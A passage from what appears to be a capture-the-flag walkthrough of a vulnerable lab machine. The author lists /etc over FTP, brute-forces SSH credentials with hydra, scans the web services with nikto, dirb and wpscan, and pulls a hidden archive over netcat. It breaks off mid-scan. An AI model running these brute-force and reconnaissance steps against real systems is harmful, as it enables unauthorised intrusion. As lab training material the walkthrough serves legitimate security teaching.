drwxr-xr-x 2 0 0 4096 Jun 03 2016 dnsmasq.d
drwxr-xr-x 4 0 0 4096 Jun 07 2016 dpkg
-rw-r--r-- 1 0 0 96 Apr 20 2016 environment
drwxr-xr-x 4 0 0 4096 Jun 03 2016 fonts
-rw-r--r-- 1 0 0 594 Jun 03 2016 fstab
-rw-r--r-- 1 0 0 132 Feb 11 2016 ftpusers
-rw-r--r-- 1 0 0 280 Jun 20 2014 fuse.conf
-rw-r--r-- 1 0 0 2584 Feb 18 2016 gai.conf
-rw-rw-r-- 1 0 0 1253 Jun 04 2016 group
-rw------- 1 0 0 1240 Jun 03 2016 group-
drwxr-xr-x 2 0 0 4096 Jun 03 2016 grub.d
-rw-r----- 1 0 42 1004 Jun 04 2016 gshadow
-rw------- 1 0 0 995 Jun 03 2016 gshadow-
drwxr-xr-x 3 0 0 4096 Jun 03 2016 gss
-rw-r--r-- 1 0 0 92 Oct 22 2015 host.conf
-rw-r--r-- 1 0 0 12 Jun 03 2016 hostname
-rw-r--r-- 1 0 0 469 Jun 05 2016 hosts
-rw-r--r-- 1 0 0 411 Jun 03 2016 hosts.allow
-rw-r--r-- 1 0 0 711 Jun 03 2016 hosts.deny
-rw-r--r-- 1 0 0 1257 Jun 03 2016 inetd.conf
drwxr-xr-x 2 0 0 4096 Feb 06 2016 inetd.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 init
drwxr-xr-x 2 0 0 4096 Jun 06 2016 init.d
drwxr-xr-x 5 0 0 4096 Jun 03 2016 initramfs-tools
-rw-r--r-- 1 0 0 1748 Feb 04 2016 inputrc
drwxr-xr-x 3 0 0 4096 Jun 03 2016 insserv
-rw-r--r-- 1 0 0 771 Mar 06 2015 insserv.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 insserv.conf.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iproute2
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iptables
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iscsi
-rw-r--r-- 1 0 0 345 May 15 17:54 issue
-rw-r--r-- 1 0 0 197 Jun 03 2016 issue.net
drwxr-xr-x 2 0 0 4096 Jun 03 2016 kbd
drwxr-xr-x 5 0 0 4096 Jun 03 2016 kernel
-rw-r--r-- 1 0 0 144 Jun 03 2016 kernel-img.conf
-rw-r--r-- 1 0 0 26754 Jun 07 2016 ld.so.cache
-rw-r--r-- 1 0 0 34 Jan 27 2016 ld.so.conf
drwxr-xr-x 2 0 0 4096 Jun 07 2016 ld.so.conf.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 ldap
-rw-r--r-- 1 0 0 267 Oct 22 2015 legal
-rw-r--r-- 1 0 0 191 Jan 19 2016 libaudit.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 libnl-3
drwxr-xr-x 4 0 0 4096 Jun 06 2016 lighttpd
-rw-r--r-- 1 0 0 2995 Apr 14 2016 locale.alias
-rw-r--r-- 1 0 0 9149 Jun 03 2016 locale.gen
-rw-r--r-- 1 0 0 3687 Jun 03 2016 localtime
drwxr-xr-x 6 0 0 4096 Jun 03 2016 logcheck
-rw-r--r-- 1 0 0 10551 Mar 29 2016 login.defs
-rw-r--r-- 1 0 0 703 May 06 2015 logrotate.conf
drwxr-xr-x 2 0 0 4096 Jun 04 2016 logrotate.d
-rw-r--r-- 1 0 0 103 Apr 12 2016 lsb-release
drwxr-xr-x 2 0 0 4096 Jun 03 2016 lvm
-r--r--r-- 1 0 0 33 Jun 03 2016 machine-id
-rw-r--r-- 1 0 0 111 Nov 20 2015 magic
-rw-r--r-- 1 0 0 111 Nov 20 2015 magic.mime
-rw-r--r-- 1 0 0 2579 Jun 04 2016 mailcap
-rw-r--r-- 1 0 0 449 Oct 30 2015 mailcap.order
drwxr-xr-x 2 0 0 4096 Jun 03 2016 mdadm
-rw-r--r-- 1 0 0 24241 Oct 30 2015 mime.types
-rw-r--r-- 1 0 0 967 Oct 30 2015 mke2fs.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 modprobe.d
-rw-r--r-- 1 0 0 195 Apr 20 2016 modules
drwxr-xr-x 2 0 0 4096 Jun 03 2016 modules-load.d
lrwxrwxrwx 1 0 0 19 Jun 03 2016 mtab -> ../proc/self/mounts
drwxr-xr-x 4 0 0 4096 Jun 06 2016 mysql
drwxr-xr-x 7 0 0 4096 Jun 03 2016 network
-rw-r--r-- 1 0 0 91 Oct 22 2015 networks
drwxr-xr-x 2 0 0 4096 Jun 03 2016 newt
-rw-r--r-- 1 0 0 497 May 04 2014 nsswitch.conf
drwxr-xr-x 2 0 0 4096 Apr 20 2016 opt
lrwxrwxrwx 1 0 0 21 Jun 03 2016 os-release -> ../usr/lib/os-release
-rw-r--r-- 1 0 0 6595 Jun 23 2015 overlayroot.conf
-rw-r--r-- 1 0 0 552 Mar 16 2016 pam.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 pam.d
-rw-r--r-- 1 0 0 2908 Jun 04 2016 passwd
-rw------- 1 0 0 2869 Jun 03 2016 passwd-
drwxr-xr-x 4 0 0 4096 Jun 03 2016 perl
drwxr-xr-x 3 0 0 4096 Jun 03 2016 php
drwxr-xr-x 3 0 0 4096 Jun 06 2016 phpmyadmin
drwxr-xr-x 3 0 0 4096 Jun 03 2016 pm
drwxr-xr-x 5 0 0 4096 Jun 03 2016 polkit-1
drwxr-xr-x 3 0 0 4096 Jun 03 2016 postfix
drwxr-xr-x 4 0 0 4096 Jun 03 2016 ppp
-rw-r--r-- 1 0 0 575 Oct 22 2015 profile
drwxr-xr-x 2 0 0 4096 Jun 03 2016 profile.d
-rw-r--r-- 1 0 0 2932 Oct 25 2014 protocols
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python2.7
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3.5
-rwxr-xr-x 1 0 0 472 Jun 06 2016 rc.local
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc0.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc1.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc2.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc3.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc4.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc5.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc6.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rcS.d
-rw-r--r-- 1 0 0 23 May 15 17:54 resolv.conf
drwxr-xr-x 5 0 0 4096 Jun 06 2016 resolvconf
-rwxr-xr-x 1 0 0 268 Nov 10 2015 rmt
-rw-r--r-- 1 0 0 887 Oct 25 2014 rpc
-rw-r--r-- 1 0 0 1371 Jan 27 2016 rsyslog.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 rsyslog.d
drwxr-xr-x 3 0 0 4096 May 15 17:54 samba
-rw-r--r-- 1 0 0 3663 Jun 09 2015 screenrc
-rw-r--r-- 1 0 0 4038 Mar 29 2016 securetty
drwxr-xr-x 4 0 0 4096 Jun 03 2016 security
drwxr-xr-x 2 0 0 4096 Jun 03 2016 selinux
-rw-r--r-- 1 0 0 19605 Oct 25 2014 services
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sgml
-rw-r----- 1 0 42 4518 Jun 05 2016 shadow
-rw------- 1 0 0 1873 Jun 03 2016 shadow-
-rw-r--r-- 1 0 0 125 Jun 03 2016 shells
drwxr-xr-x 2 0 0 4096 Jun 03 2016 skel
-rw-r--r-- 1 0 0 100 Nov 25 2015 sos.conf
drwxr-xr-x 2 0 0 4096 Jun 04 2016 ssh
drwxr-xr-x 4 0 0 4096 Jun 03 2016 ssl
-rw-r--r-- 1 0 0 644 Jun 04 2016 subgid
-rw------- 1 0 0 625 Jun 03 2016 subgid-
-rw-r--r-- 1 0 0 644 Jun 04 2016 subuid
-rw------- 1 0 0 625 Jun 03 2016 subuid-
-r--r----- 1 0 0 769 Jun 05 2016 sudoers
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sudoers.d
-rw-r--r-- 1 0 0 2227 Jun 03 2016 sysctl.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sysctl.d
drwxr-xr-x 5 0 0 4096 Jun 03 2016 systemd
drwxr-xr-x 2 0 0 4096 Jun 03 2016 terminfo
-rw-r--r-- 1 0 0 14 Jun 03 2016 timezone
drwxr-xr-x 2 0 0 4096 Apr 12 2016 tmpfiles.d
-rw-r--r-- 1 0 0 1260 Mar 16 2016 ucf.conf
drwxr-xr-x 4 0 0 4096 Jun 03 2016 udev
drwxr-xr-x 3 0 0 4096 Jun 03 2016 ufw
drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-motd.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-notifier
drwxr-xr-x 2 0 0 4096 Jun 03 2016 vim
drwxr-xr-x 3 0 0 4096 Jun 03 2016 vmware-tools
-rw-r--r-- 1 0 0 278 Jun 03 2016 vsftpd.banner
-rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.chroot_list
-rw-r--r-- 1 0 0 5961 Jun 04 2016 vsftpd.conf
-rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.user_list
lrwxrwxrwx 1 0 0 23 Jun 03 2016 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r-- 1 0 0 4942 Jan 08 2016 wgetrc
drwxr-xr-x 3 0 0 4096 Jun 03 2016 xdg
drwxr-xr-x 2 0 0 4096 Jun 03 2016 xml
drwxr-xr-x 2 0 0 4096 Jun 03 2016 zsh
226 Directory send OK.
ftp> exit
221 Goodbye.
root@kali:~#
Port 22–Enumerating ssh OpenSSH 7.2p2
Trying to access SSH we come across a username Barry. Apart from we could not find anything that was interesting.
root@kali:~# ssh root@192.168.1.30
The authenticity of host '192.168.1.30 (192.168.1.30)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.30' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
root@192.168.1.30's password:So lets crack SSH credentials using the hydra.
root@kali:~# hydra -L user_list.txt -P user_list.txt 192.168.1.30 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-15 15:54:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 729 login tries (l:27/p:27), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.30 login: SHayslett password: SHayslett
[STATUS] 274.00 tries/min, 274 tries in 00:01h, 455 to do in 00:02h, 16 active
[STATUS] 274.50 tries/min, 549 tries in 00:02h, 180 to do in 00:01h, 16 active
[STATUS] 243.00 tries/min, 729 tries in 00:03h, 1 to do in 00:01h, 16 active
[STATUS] 182.25 tries/min, 729 tries in 00:04h, 1 to do in 00:01h, 16 active
[STATUS] 145.80 tries/min, 729 tries in 00:05h, 1 to do in 00:01h, 16 active
[STATUS] 121.50 tries/min, 729 tries in 00:06h, 1 to do in 00:01h, 16 active
[STATUS] 104.14 tries/min, 729 tries in 00:07h, 1 to do in 00:01h, 16 active
[STATUS] 91.12 tries/min, 729 tries in 00:08h, 1 to do in 00:01h, 16 active
[STATUS] 81.00 tries/min, 729 tries in 00:09h, 1 to do in 00:01h, 16 active
[STATUS] 72.90 tries/min, 729 tries in 00:10h, 1 to do in 00:01h, 16 active
[STATUS] 66.27 tries/min, 729 tries in 00:11h, 1 to do in 00:01h, 16 active
[STATUS] 60.75 tries/min, 729 tries in 00:12h, 1 to do in 00:01h, 16 active
[STATUS] 56.08 tries/min, 729 tries in 00:13h, 1 to do in 00:01h, 16 active
[STATUS] 52.07 tries/min, 729 tries in 00:14h, 1 to do in 00:01h, 16 active
[STATUS] 48.60 tries/min, 729 tries in 00:15h, 1 to do in 00:01h, 16 active
[STATUS] 45.56 tries/min, 729 tries in 00:16h, 1 to do in 00:01h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@kali:~#
Now that we have credentials for SHayslett we can login.
root@kali:~# ssh SHayslett@192.168.1.30
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.1.30's password:SHayslett
Welcome back!SHayslett@red:~$ id
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)
SHayslett@red:~$
From here you could find follow along any 3 privilege escalation methods detailed in the later half of the post. But for now lets move on with the enumeration phase.
Port 80–Enumerating http
Lets run nikto to find out what it discovers.
root@kali:~# nikto -h http://192.168.1.30/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.30
+ Target Hostname: 192.168.1.30
+ Target Port: 80
+ Start Time: 2017-05-14 21:53:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2017-05-14 21:54:08 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#Lets run dirb.
root@kali:~# dirb http://192.168.1.30/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Sun May 14 22:07:13 2017
URL_BASE: http://192.168.1.30/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: http://192.168.1.30/ ----
+ http://192.168.1.30/.bashrc (CODE:200|SIZE:3771)
+ http://192.168.1.30/.profile (CODE:200|SIZE:675)-----------------
END_TIME: Sun May 14 22:07:17 2017
DOWNLOADED: 4612 - FOUND: 2
root@kali:~# wget http://192.168.1.30/.bashrc
--2017-05-14 22:08:54-- http://192.168.1.30/.bashrc
Connecting to 192.168.1.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3771 (3.7K) [application/octet-stream]
Saving to: ‘.bashrc.1’.bashrc.1 100%[================================>] 3.68K --.-KB/s in 0s2017-05-14 22:08:54 (417 MB/s) - ‘.bashrc.1’ saved [3771/3771]root@kali:~# wget http://192.168.1.30/.profile
--2017-05-14 22:09:01-- http://192.168.1.30/.profile
Connecting to 192.168.1.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 675 [application/octet-stream]
Saving to: ‘.profile.1’.profile.1 100%[================================>] 675 --.-KB/s in 0s2017-05-14 22:09:01 (112 MB/s) - ‘.profile.1’ saved [675/675]root@kali:~# ls -la .*.1
-rw-r--r-- 1 root root 3771 May 14 22:08 .bashrc.1
-rw-r--r-- 1 root root 675 May 14 22:09 .profile.1
root@kali:~#
Neither nikto nor dirb found anything that we could use. Accessing the page in the browser gives us nothing interesting as well.
Lets move on to the next port.
Port 666 — Enumerating using nc
root@kali:~# nc 192.168.1.30 666
Pd��Hp���,2
message2.jpgUT +�QWJ�QWux
<snip>
root@kali:~# nc 192.168.1.30 666 > pic.jpeg
root@kali:~# file pic.jpeg
pic.jpeg: Zip archive data, at least v2.0 to extract
root@kali:~# unzip pic.jpeg
Archive: pic.jpeg
inflating: message2.jpg
root@kali:~# strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
/<}m
>,xr?
u-o[
Sxw]
v;]>
|_m7
l~!|0
<Elu
I[[k:>
>5[^k
;o{o
>xgH
mCXi
PE<R"
umcV
g[Y@=
[\Y_
\Oku
'X|(
?=?i
//Do
1okb
,>,&
n<;oc
*? xC
~ |y
6{M6
root@kali:~#Port 12380 — Enumerate http Apache httpd 2.4.18
There is an Apache server running on a non standard port. Lets open it up in the browser.
Lets run amap
root@kali:~# amap 192.168.1.30 12380
amap v5.4 (www.thc.org/thc-amap) started at 2017-05-15 15:08:12 - APPLICATION MAPPING modeProtocol on 192.168.1.30:12380/tcp matches http
Protocol on 192.168.1.30:12380/tcp matches http-apache-2
Protocol on 192.168.1.30:12380/tcp matches ntp
Protocol on 192.168.1.30:12380/tcp matches sslUnidentified ports: none.amap v5.4 finished at 2017-05-15 15:08:18
root@kali:~#
Lets run dirb
root@kali:~# dirb http://192.168.1.30:12380/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Sun May 14 22:17:19 2017
URL_BASE: http://192.168.1.30:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: http://192.168.1.30:12380/ ---------------------
END_TIME: Sun May 14 22:18:56 2017
DOWNLOADED: 4612 - FOUND: 0
root@kali:~#
Nothing interesting was found here as well. Let’s run nikto.
root@kali:~# nikto -h http://192.168.1.30:12380/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.30
+ Target Hostname: 192.168.1.30
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2017-05-14 22:22:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.30' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2017-05-14 22:24:38 (GMT-4) (147 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested*********************************************************************
Portions of the server's headers (Apache/2.4.18) are not in
the Nikto database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? nroot@kali:~#
Finally we found 3 interesting directories {/admin112233/, /blogblog/, /phpmyadmin/} and a robots.txt file. But trying to access any of the directories or the file just redirects us to the home page. After many futile attempts I looked back at the nikto output which stated “The site uses SSL”.
Opening https://192.168.1.30:12380/admin112233/ was definitely not welcoming. But moving on as we move ahead to https://192.168.1.30:12380/blogblog/. Finally something juicy to work with. Lets run wpscan and enumerate users and all plugins.
root@kali:~# wpscan --url https://192.168.1.30:12380/blogblog/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________[+] URL: https://192.168.1.30:12380/blogblog/
[+] Started: Sun May 14 22:42:54 2017[!] The WordPress 'https://192.168.1.30:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.1.30:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.1.30:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-includes/[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 35 vulnerabilities identified from the version number[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979
Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: https://hackerone.com/reports/110801
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
Reference: https://wpvulndb.com/vulnerabilities/8474
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
Reference: https://wpvulndb.com/vulnerabilities/8475
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
Reference: http://avlidienbrunn.com/wp_some_loader.php
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
